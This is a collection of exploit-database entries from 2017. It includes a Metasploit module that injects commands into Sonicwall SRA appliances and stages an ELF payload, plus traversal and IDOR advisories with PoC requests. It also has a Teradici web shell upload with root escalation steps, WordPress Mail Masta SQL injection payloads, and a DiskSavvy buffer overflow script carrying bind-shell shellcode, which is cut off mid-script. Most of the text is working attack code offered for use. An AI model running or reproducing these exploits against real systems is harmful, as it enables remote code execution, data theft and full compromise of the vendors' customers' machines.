# Exploit Title: Sonicwall viewcert.cgi CGI Remote Command Injection Vulnerability
# Date: 12/24/2016
# Exploit Author: xort @ Critical Start
# Vendor Homepage: www.sonicwall.com
# Software Link: sonicwall.com/products/sra-virtual-appliance
# Version: 8.1.0.2-14sv
# Tested on: 8.1.0.2-14sv
#
# CVE : (awaiting cve)
# vuln: viewcert.cgi / CERT parameter
# Description PostAuth Sonicwall SRA <= v8.1.0.2-14sv. This exploit leverages a command injection bug.
#
# xort @ Critical Start
require 'msf/core'
# Metasploit module for the post-authentication command injection in the
# Sonicwall SRA 'viewcert' CGI described in the header. Flow: do_login obtains
# the session ('swap') cookie from /cgi-bin/userLogin, then exploit injects
# shell commands through the CERT parameter of /cgi-bin/viewcert — either the
# operator's CMD or a staged Linux x86 ELF payload.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Exploit::Remote::Tcp   # not referenced by the code below; HttpClient does all the I/O
  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata and the options the operator can set.
  #
  # @param info [Hash] metadata overrides merged by the framework via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Sonicwall SRA <= v8.1.0.2-14sv viewcert.cgi remote exploit',
      'Description' => %q{
This module exploits a remote command execution vulnerability in
the Sonicwall SRA Appliance Version <= v8.1.0.2-14sv. The vulnerability exist in
a section of the machine's adminstrative infertface for performing configurations
related to on-connect scripts to be launched for users's connecting.
},
      'Author' =>
        [
          'xort@Critical Start', # vuln + metasploit module
        ],
      'Version' => '$Revision: 1 $',
      # NOTE(review): placeholder entry — no advisory URL or CVE is recorded
      # (the header says a CVE was still pending).
      'References' =>
        [
          [ 'none', 'none'],
        ],
      'Platform' => [ 'linux'],
      # NOTE(review): 'Privileged' appears twice (true here, false below). In a
      # Ruby hash literal the later key wins, so the module actually reports
      # Privileged => false.
      'Privileged' => true,
      'Arch' => [ ARCH_X86 ],
      'SessionTypes' => [ 'shell' ],
      'Privileged' => false,
      'Payload' =>
        {
          'Compat' =>
            {
              'ConnectionType' => 'find',
            }
        },
      'Targets' =>
        [
          ['Linux Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            }
          ],
        ],
      'DefaultTarget' => 0))
    register_options(
      [
        OptString.new('PASSWORD', [ false, 'Device password', "" ]),
        # NOTE(review): this option is the login user name (default "admin"),
        # but its description string still reads 'Device password'.
        OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
        OptString.new('CMD', [ false, 'Command to execute', "" ]),
        Opt::RPORT(443),
      ], self.class)
  end

  # Authenticates against /cgi-bin/userLogin with a form-encoded POST and
  # returns the session cookie the appliance hands back.
  #
  # @param username [String] sent as the 'username' form field
  # @param password_clear [String] clear-text password, sent as 'password'
  # @return [String, nil] the value of the 'swap' cookie, nil when nothing matched
  # @raise [NoMethodError] when the request yields no response (res is nil) or
  #   the response has no Set-Cookie header — neither case is guarded here
  def do_login(username, password_clear)
    vprint_status( "Logging into machine with credentials...\n" )
    # vars
    timeout = 1550;   # response timeout handed to send_request_cgi
    # send request
    res = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => "/cgi-bin/userLogin",
        'headers' => {
          'Connection' => 'close',
          'Content-Type' => 'application/x-www-form-urlencoded',
          'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0',
        },
        'vars_post' => {
          'username' => username,
          'password' => password_clear,
          'domain' => 'LocalDomain',
          'loginButton' => 'Login',
          'state' => 'login',
          'login' => 'true',
          'VerifyCert' => '0',
          'portalname' => 'VirtualOffice',
          'ajax' => 'true'
        },
      }, timeout)
    # NOTE(review): '\n' in single quotes is a backslash followed by 'n', not a
    # newline, so split() almost certainly leaves the header as a single
    # element; grep then yields the second capture (the cookie value) of the
    # match. The pattern is unanchored, so any cookie whose name ends in
    # "swap" would also match — presumably only 'swap' is set; confirm against
    # a real response. Nothing checks that the login actually succeeded.
    swap = res.headers['Set-Cookie'].split('\n').grep(/(.*)swap=([^;]+);/){$2}[0]
    return swap
  end

  # Sends one command through the injection point named in the header: the
  # CERT field of a POST to /cgi-bin/viewcert, wrapped in backticks after a
  # fake certificate name, with the session cookie attached. cmd is placed
  # into the body verbatim (no URL-encoding and no shell quoting).
  #
  # @param swap_cookie [String] value returned by do_login
  # @param cmd [String] shell command text to run on the appliance
  # @return the response object from send_request_cgi (may be nil if the
  #   request fails); every caller in this file ignores it
  def run_command(swap_cookie, cmd)
    # vars
    timeout = 1550;
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => "/cgi-bin/viewcert",
      'data' => "buttontype=delete&CERT=newcert-1`#{cmd}`",
      'headers' =>
        {
          'Cookie' => "swap=#{swap_cookie}",
        },
    }, timeout)
  end

  # Stages a long command on the appliance in pieces and then runs it. cmd is
  # rewritten as a string of \xNN escapes, cut into 36-character chunks (nine
  # whole escapes each, so no escape straddles two requests), and each chunk is
  # written to dump_file with printf — '>' for the first write, '>>' after
  # that. A final request executes the assembled file with sh.
  #
  # @param swap_cookie [String] value returned by do_login
  # @param cmd [String] command text to stage; may be arbitrarily long
  # @return the response of the final run_command call (ignored by the caller)
  def run_command_spliced(swap_cookie, cmd)
    write_mode = ">"
    dump_file = "/tmp/qq"
    reqs = 0
    # unpack("H*") gives lowercase hex; the gsub turns each byte pair into "\xNN"
    cmd_encoded = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
    # NOTE(review): the split pattern is a capture group, so Ruby returns the
    # captured 36-char chunks interleaved with the (empty) text between them;
    # those empty strings go round the loop too and each costs one request.
    for cmd_chunk in cmd_encoded.split(/(....................................)/)
      cmd_new = "printf \"#{cmd_chunk}\"#{write_mode}#{dump_file}"
      reqs += 1
      vprint_status("Running Command (#{reqs})\n")
      # set to normal append for loops after the first round
      if write_mode == ">"
        write_mode = ">>"
      end
      # send this chunk immediately (the original comment about queueing it in
      # an array for later was stale)
      run_command(swap_cookie, cmd_new)
    end
    # vprint_status("Running Final Command ...\n")
    # execute payload stored at dump_file
    # (the path is repeated literally here rather than taken from dump_file)
    run_command(swap_cookie, "chmod +x /tmp/qq; sh /tmp/qq")
  end

  # Module entry point. Logs in, then either executes the operator's CMD
  # (staged to /tmp/n) or stages the framework-generated Linux x86 ELF payload
  # through run_command_spliced and hands over to the payload handler.
  #
  # @return [void]
  def exploit
    # timeout
    timeout = 1550;   # unused in this method; each request helper sets its own
    # params
    password_clear = datastore['PASSWORD']
    user = datastore['USERNAME']
    # do authentication
    swap_cookie = do_login(user, password_clear)
    vprint_status("authenticated 'swap' cookie: #{swap_cookie}\n")
    #if no 'CMD' string - add code for root shell
    # (low-precedence `not`/`and`; reads as `!cmd.nil? && !cmd.empty?` here)
    if not datastore['CMD'].nil? and not datastore['CMD'].empty?
      cmd = datastore['CMD']
      # Encode cmd payload
      encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
      # kill stale calls to bdump from previous exploit calls for re-use
      # (one request: remove any leftover /tmp/n, write the encoded command
      # there, mark it executable and run it; sudo is applied only to the rm)
      run_command(swap_cookie, ("sudo /bin/rm -f /tmp/n; printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n; /tmp/n" ))
    else
      # Encode payload to ELF file for deployment
      elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
      encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
      # the spliced path is used here — presumably because the encoded ELF is
      # too long for a single request; the staged command writes /tmp/m and runs it
      run_command_spliced(swap_cookie, "printf \"#{encoded_elf}\">/tmp/m;chmod +rx /tmp/m;/tmp/m")
      # wait for magic
      handler
    end
  end
end
Document Title:
===============
Lock Photos Album&Videos Safe v4.3 - Directory Traversal Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2032
Release Date:
=============
2017-02-21
Vulnerability Laboratory ID (VL-ID):
====================================
2032
Common Vulnerability Scoring System:
====================================
7.8
Product & Service Introduction:
===============================
You can lock and manage your private photos, videos, text messages, voice recordings, notes, documents and other files very easily! You can store
and view PDF, Text(can be created and edited), PowerPoint, Word, Excel, Html, Pages, Key, Numbers and play music very simply! You can as well do
more things in one app and manage your life better!
(Copy of the Homepage: https://itunes.apple.com/us/app/lock-photos-album-video.s/id448033053 )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a remote directory traversal vulnerability in the official Galaxy Studio Lock Photos Album & Videos Safe v4.3 iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2017-02-21: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Galaxy Studio (Mo Wellin)
Product: Lock Photos Album & Videos Safe - iOS Mobile (Web-Application) 4.3
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A directory traversal vulnerability has been discovered in the official Galaxy Studio Lock Photos Album & Videos Safe v4.3 iOS mobile application.
The security vulnerability allows attackers to make unauthorized requests for, and download, local application files by using manipulated path parameters.
The directory traversal web vulnerability is located in the `PRE` parameter of the wifi web-server interface. Remote attackers are able to request
the local web-server during the sharing process to access unauthenticated application files. Attackers are able to request via form action path
variables to access, download or upload arbitrary files. Remote attackers are able to access the SQLite database file that holds the web-server
access credentials of the application. After the download the attacker is able to open the database file and use the credentials
for unauthorized access via protocol. The PRE request with the action form variable allows to inject any path of the local file system without check
for privileges or user access rights. Thus allows an attacker to bypass the local path restriction to compromise the mobile ios web-server application.
The request method to inject is GET and the attack vector is located on the client-side of the web-server web-application. Finally an attacker is able
to access with the credentials the service by using a client via http protocol.
The security risk of the directory traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.8.
Exploitation of the web vulnerability requires no privilege web-application user account or user interaction. Successful exploitation of the
vulnerability results in information leaking, mobile application compromise by unauthorized and unauthenticated access.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] PRE
Vulnerable Parameter(s):
[+] form action
Affected Module(s):
[+] Web-Server File System
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers without user interaction or privilege web-application user account.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Standard Request:
http://localhost:5555/?PRE=action form
PoC: Payload
//..//..//..//..//..//..//..//..//%00
/../../../../../../../../%00
PoC: Exploitation
http://localhost:5555/?PRE=action form=/../../../../../../../../%00
PoC: Exploit
# Single-request PoC: issues the traversal GET shown above and prints the raw
# response body. The literal space in "action form" is sent un-encoded here
# (the session log above shows the browser sending it as %20), and the
# response status is not checked — ->content is printed whatever it was.
use strict;
use LWP::UserAgent;
my $b = LWP::UserAgent->new();
my $host = "localhost:5555";   # host:port of the app's Wi-Fi sharing web server, as in the advisory
print $b->get("http://".$host."/?PRE=action form=/../../../../../../../../%00")->content;
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://localhost:5555/?PRE=action%20form=//..//..//..//..//..//..//..//..//%00 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:5555]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Connection[keep-alive]
Upgrade-Insecure-Requests[1]
Response Header:
Date[Di., 21 Feb. 2017 09:21:48 GMT]
Accept-Ranges[bytes]
Content-Length[0]
PoC: Vulnerable Source
{
"paths" : [
"/Picture/Public/path/All Image/"
],
"folder" : "/Picture/Public/path",
"code" : 1
}
... manipulated
{
"paths" : [
],
"folder" : "/../../../../../../../../%00",
"code" : 1
}
Reference(s):
http://localhost:5555/
http://localhost:5555/?PRE
Solution - Fix & Patch:
=======================
The security vulnerability can be resolved by preventing users from reaching parent directories above the application's own path. Ensure that the form
action request denies access to web-server data or application configuration files. Parse and restrict the form action parameter to
prevent further directory traversal attacks.
Security Risk:
==============
The security risk of the directory traversal web vulnerability in the mobile web-server application is estimated as high. (CVSS 7.8)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
Document Title:
===============
ProjectSend r754 - IDOR & Authentication Bypass Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2031
Release Date:
=============
2017-02-21
Vulnerability Laboratory ID (VL-ID):
====================================
2031
Common Vulnerability Scoring System:
====================================
5.3
Product & Service Introduction:
===============================
ProjectSend is a self-hosted application (you can install it easily on your own VPS or shared web hosting account) that lets
you upload files and assign them to specific clients that you create yourself! Secure, private and easy. No more depending
on external services or e-mail to send those files.
(Copy of the Homepage: http://www.projectsend.org/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered an IDOR and authentication bypass vulnerability in the ProjectSend-r754 web-application.
Vulnerability Disclosure Timeline:
==================================
2017-02-20: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
GNU GPL License
Product: ProjectSend r754
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
An insecure direct object reference occurs when an application provides direct access to objects based on user-supplied input.
As a result of this vulnerability, attackers can bypass authorization and access resources in the system. Insecure Direct Object References
allow attackers to bypass authorization and access resources directly by modifying the value of the [client] parameter used, so that it points
to other client account names, which allows an attacker to download other clients' private data with no secure method provided.
Vulnerability Method(s):
[+] GET
Vulnerable Module(s):
[+] process.php?do=zip_download
Vulnerable Parameter(s):
[+] client
[+] file
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers with low privilege web-application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
1. User "A" as attacker checks a file to download as zip extension, then clicks download to modify values as required ...
2. Application responds with the client file list, so then you are able to download all other side user B data files with zip extension
--- PoC Session Logs ---
GET /ProjectSend-r754/process.php?do=zip_download&client=[CLIENTNAME]&files%5B%5D=2 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://localhost/ProjectSend-r754/my_files/
Cookie: PHPSESSID=kb0uotq6mssklf213v4a7fje47
Connection: keep-alive
-
HTTP/1.1 200 OK
Date: Sun, 05 Feb 2017 19:07:41 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.44-0+deb7u1
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 6
Name of Files: .jpg
Video PoC:
https://www.youtube.com/watch?v=Xc6Jg9I7Pj4
Security Risk:
==============
The security risk of the web vulnerability in the ProjectSend-r754 web-application function is estimated as medium. (CVSS 5.3)
Credits & Authors:
==================
Lawrence Amer - Vulnerability Laboratory [Research Team] - (http://lawrenceamer.me) (https://www.vulnerability-lab.com/show.php?user=Lawrence Amer)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
# Exploit Title: Teradici Management Console 2.2.0 - Web Shell Upload and Privilege Escalation
# Date: February 22nd, 2017
# Exploit Author: hantwister
# Vendor Homepage: http://www.teradici.com/products-and-solutions/pcoip-products/management-console
# Software Link: https://techsupport.teradici.com/ics/support/DLRedirect.asp?fileID=63583 (login required)
# Version: 2.2.0
Users that can access the Settings > Database Management page can achieve code
execution as root on older versions of PCoIP MC 2.x. (Based on CentOS 7 x64)
Web Shell Upload Vulnerability Overview
---------------------------------------
Database archives are extracted under /opt/jetty/tmpdeploy. By creating a
malicious archive with a malicious web script that extracts to the known
directory /opt/jetty/tmpdeploy/jetty-0.0.0.0-8080-console.war-_console-any-
it is possible to add or modify class files and XML files pertaining to the
application.
Privilege Escalation Vulnerability Overview
-------------------------------------------
The jetty user owns the file /opt/jetty/jetty_self_restart.sh, and the same user
has sudo rights to run that file without a password. By manipulating this file,
arbitrary code can be run as root.
Exploiting The Vulnerabilities
------------------------------
alice:~$ mkdir -p runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images
alice:~$ cd runasroot
alice:~/runasroot$ msfvenom (snip) > evil
alice:~/runasroot$ chmod a+x evil
alice:~/runasroot$ nano modify_self_restart.sh
#!/bin/bash
echo /tmp/evil >> /opt/jetty/jetty_self_restart.sh
alice:~/runasroot$ chmod a+x modify_self_restart.sh
alice:~/runasroot$ cd jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images
alice:~/runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images$ nano runasroot.gsp
<html>
<head>
<title>runasroot</title>
</head>
<body>
<pre>
<% out << "cp /opt/jetty/tmpdeploy/evil /tmp/".execute().text %>
<% out << "/opt/jetty/tmpdeploy/modify_self_restart.sh".execute().text %>
<% out << "sudo /opt/jetty/jetty_self_restart.sh".execute().text %>
</pre>
</body>
</html>
alice:~/runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images$ cd ../../..
alice:~/runasroot$ tar -zcf runasroot.tar.gz evil modify_self_restart.sh jetty-0.0.0.0-8080-console.war-_console-any-
alice:~/runasroot$ openssl enc -e -aes-256-cbc -salt -in runasroot.tar.gz -out runasroot.archive -pass pass:4400Dominion -p
Now, choose to upload runasroot.archive through the Database Management page. An
error will be displayed that it wasn't a valid archive. Now, navigate to
https://IP/console/images/runasroot.gsp
# Exploit Title: Multiple SQL injection vulnerabilities in Mail Masta (aka mail-masta) plugin 1.0 for Wordpress.
# Date: 02/18/2017
# Exploit Author: Hanley Shun
# Vendor Homepage: https://wpcore.com/plugin/mail-masta
# Software Link: https://www.exploit-db.com/apps/78745b48b15bf2b81153556ef1c8ec48-mail-masta.zip
# Version: 1.0
# Tested on: Kali Linux x64, Ubuntu 14.04 x64
# CVE : [CVE-2017-6095, CVE-2017-6096, CVE-2017-6097, CVE-2017-6098]
Mail-Masta SQL Injection
Page: ./wp-content/plugins/mail-masta/inc/lists/csvexport.php (Unauthenticated)
GET Parameter: list_id
http://my_wp_app/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/var/www/html/wordpress/wp-load.php
csvexport.php:
// csvexport.php (vulnerable excerpt; reachable without authentication per the
// advisory): list_id is read straight from the query string and concatenated
// into two SELECT statements with no cast and no $wpdb->prepare() placeholder,
// so whatever the client sends is executed as SQL. Remediation is a bound
// integer placeholder for both statements, e.g.
//   $wpdb->prepare("SELECT * FROM $mail_subscribers WHERE list_id = %d", $list_id)
// (the $wpdb->prefix table names are trusted values and may stay interpolated),
// or at minimum absint($list_id) before use.
$list_id=$_GET['list_id'];
global $wpdb;
$mail_subscribers = $wpdb->prefix . "masta_subscribers";
$masta_list = $wpdb->prefix . "masta_list";
$check_sql = "SELECT * FROM $mail_subscribers WHERE list_id = $list_id";   // injection point
$check_list="SELECT * FROM $masta_list WHERE list_id= $list_id";           // injection point
$wp_list=$wpdb->get_results($check_sql);
$wp_list_s=$wpdb->get_results($check_list);
Page: ./wp-content/plugins/mail-masta/inc/lists/view-list.php (Requires Wordpress admin)
GET Parameter: filter_list
http://my_wp_app/wp-admin/admin.php?page=masta-lists&action=view_list&filter_list=0+OR+1%3D1
view-list.php:
// view-list.php (vulnerable excerpt; admin-only per the advisory): filter_list
// is interpolated into the SQL string before $wpdb->prepare() ever sees it, so
// prepare() has no placeholder to bind and gives no protection here. The
// trailing $query argument is not defined in this excerpt and appears to be
// unused. The fix is to take the value out of the string — "... WHERE
// list_id = %d" with $list_id passed as the bound argument — in both statements.
global $wpdb;
$list_id = $_GET['filter_list'];
$masta_list = $wpdb->prefix . "masta_list";
$masta_subscribers = $wpdb->prefix . "masta_subscribers";
$listdata = $wpdb->get_results( $wpdb->prepare("SELECT * FROM $masta_list WHERE list_id= $list_id",$query));   // value already inlined; prepare() binds nothing
$list_subscribers = $wpdb->get_var( $wpdb->prepare("SELECT COUNT( `list_id` ) FROM $masta_subscribers WHERE list_id= $list_id AND status=1",$query));
Page: ./wp-content/plugins/mail-masta/inc/campaign/count_of_send.php (Requires Wordpress admin)
POST Parameter: camp_id
http://my_wp_app/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php/?pl=/var/www/html/wordpress/wp-load.php
count_of_send.php:
// count_of_send.php (vulnerable excerpt; admin-only per the advisory). Two
// issues: include() of a path taken verbatim from the query string (`pl`) —
// the advisory's request uses it to load wp-load.php, and as written it is an
// arbitrary local-file include — and camp_id from the POST body concatenated
// into the query with no escaping or placeholder. Fix: replace the dynamic
// include with WordPress's normal bootstrap and bind camp_id with %d via
// $wpdb->prepare().
include($_GET['pl']);
global $wpdb;
$camp_id=$_POST['camp_id'];
$masta_reports = $wpdb->prefix . "masta_reports";
$count=$wpdb->get_results("SELECT count(*) co from $masta_reports where camp_id=$camp_id and status=1");   // injection point
Page: ./wp-content/plugins/mail-masta/inc/campaign_save.php (Requires Wordpress admin)
POST Parameter: list_id
campaign_save.php:
// campaign_save.php (vulnerable excerpt; admin-only per the advisory): list_id
// from the POST body is concatenated into the COUNT query unescaped. Note the
// hard-coded `wp_masta_subscribers` table name, unlike the other files which
// build it from $wpdb->prefix. Fix:
//   $wpdb->prepare("SELECT count(id) FROM {$wpdb->prefix}masta_subscribers WHERE list_id = %d", $list_id)
$list_id=$_POST['list_id'];
$check_list = $wpdb->get_var("SELECT count(id) FROM wp_masta_subscribers where list_id=$list_id");   // injection point
POST /wp-admin/admin-ajax.php?id= HTTP/1.1
...snip...
action=my_action&url=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Fmail-masta%2Finc%2Fcampaign_save.php&sender_selected_list_check=check&list_id=1+OR+1%3D1
# Exploit Title: DiskSavvy Enterprise 9.4.18 - Remote buffer overflow - SEH overwrite with WoW64 egghunters
# Date: 2017-02-22
# Exploit Author: Peter Baris
# Vendor Homepage: www.saptech-erp.com.au
# Software Link: http://www.disksavvy.com/downloads.html
# Version: 9.4.18
# Tested on: Windows 7 Pro SP1 x64 (fully patched) and Windows 10 Pro x64
# WoW64 egghunters are in use in this exploit, meaning it will work on specific 64bit operating systems
# Original Win7 egghunter: https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/ - but I modified it for this exploit
# Win10 WoW64 egghunter only supports x86_64 platform - developed by Peter Baris based on corelan's Win7 version
# If you require a WoW64 egghunter for additional windows versions, contact me through my website http://saptech-erp.com.au/services.php
# DiskSavvy Enterprise 9.4.18 SEH-overwrite PoC (Python 2: print statements).
# Sends a single oversized HTTP GET whose request path carries the overflow
# buffer; the target host and a Windows version selector come from argv.
# From a detection standpoint the request line is several KB long, contains
# raw non-ASCII bytes in the path and the literal tag "t00wt00w" — easy to
# alert on at a reverse proxy or IDS.
import socket
import sys

try:
    host = sys.argv[1]
    os = sys.argv[2]   # "win7" or "win10"; shadows the stdlib module name os (not imported here)
    port = 80
except IndexError:
    print "[+] Usage %s <host> win7/win10" % sys.argv[0]
    print "[i] Example: dsavvy.py localhost win10"
    sys.exit()

# 355 bytes bind shell, PORT 4444, bad chars \x09\x0a\x0d\x20
shell = ("\xba\x6c\xb1\x12\x02\xd9\xc7\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
         "\x53\x83\xee\xfc\x31\x56\x0e\x03\x3a\xbf\xf0\xf7\x3e\x57\x76"
         "\xf7\xbe\xa8\x17\x71\x5b\x99\x17\xe5\x28\x8a\xa7\x6d\x7c\x27"
         "\x43\x23\x94\xbc\x21\xec\x9b\x75\x8f\xca\x92\x86\xbc\x2f\xb5"
         "\x04\xbf\x63\x15\x34\x70\x76\x54\x71\x6d\x7b\x04\x2a\xf9\x2e"
         "\xb8\x5f\xb7\xf2\x33\x13\x59\x73\xa0\xe4\x58\x52\x77\x7e\x03"
         "\x74\x76\x53\x3f\x3d\x60\xb0\x7a\xf7\x1b\x02\xf0\x06\xcd\x5a"
         "\xf9\xa5\x30\x53\x08\xb7\x75\x54\xf3\xc2\x8f\xa6\x8e\xd4\x54"
         "\xd4\x54\x50\x4e\x7e\x1e\xc2\xaa\x7e\xf3\x95\x39\x8c\xb8\xd2"
         "\x65\x91\x3f\x36\x1e\xad\xb4\xb9\xf0\x27\x8e\x9d\xd4\x6c\x54"
         "\xbf\x4d\xc9\x3b\xc0\x8d\xb2\xe4\x64\xc6\x5f\xf0\x14\x85\x37"
         "\x35\x15\x35\xc8\x51\x2e\x46\xfa\xfe\x84\xc0\xb6\x77\x03\x17"
         "\xb8\xad\xf3\x87\x47\x4e\x04\x8e\x83\x1a\x54\xb8\x22\x23\x3f"
         "\x38\xca\xf6\xaa\x30\x6d\xa9\xc8\xbd\xcd\x19\x4d\x6d\xa6\x73"
         "\x42\x52\xd6\x7b\x88\xfb\x7f\x86\x33\x12\xdc\x0f\xd5\x7e\xcc"
         "\x59\x4d\x16\x2e\xbe\x46\x81\x51\x94\xfe\x25\x19\xfe\x39\x4a"
         "\x9a\xd4\x6d\xdc\x11\x3b\xaa\xfd\x25\x16\x9a\x6a\xb1\xec\x4b"
         "\xd9\x23\xf0\x41\x89\xc0\x63\x0e\x49\x8e\x9f\x99\x1e\xc7\x6e"
         "\xd0\xca\xf5\xc9\x4a\xe8\x07\x8f\xb5\xa8\xd3\x6c\x3b\x31\x91"
         "\xc9\x1f\x21\x6f\xd1\x1b\x15\x3f\x84\xf5\xc3\xf9\x7e\xb4\xbd"
         "\x53\x2c\x1e\x29\x25\x1e\xa1\x2f\x2a\x4b\x57\xcf\x9b\x22\x2e"
         "\xf0\x14\xa3\xa6\x89\x48\x53\x48\x40\xc9\x63\x03\xc8\x78\xec"
         "\xca\x99\x38\x71\xed\x74\x7e\x8c\x6e\x7c\xff\x6b\x6e\xf5\xfa"
         "\x30\x28\xe6\x76\x28\xdd\x08\x24\x49\xf4")

# Buffer layout (see `exploit` below): padding up to the SEH record, the
# next-SEH/handler pair, the egghunter, then the tag and the shellcode.
crash = "\x41" * 2487                  # padding to the SEH record (offset from the author's testing — TODO confirm)
retn = "\x38\x2e\x14\x10" # 0x10142e38 pop edi pop esi ret   (little-endian; hosting module not named in this file)
filler = "\x44" * (2505-334-300-100)   # 1771 trailing bytes
nseh = "\xeb\x08\x90\x90"              # next-SEH field: short jump over the handler address, nop padded
stack_fill="\x41"*100
nops="\x90"*8
egg = "t00wt00w"                       # tag the egghunter scans for; the shellcode follows it

# Hard-coded WoW64 egghunter stub, selected by the argv[2] platform string:
# Win7 variant adapted from the corelan article in the header, Win10 variant by
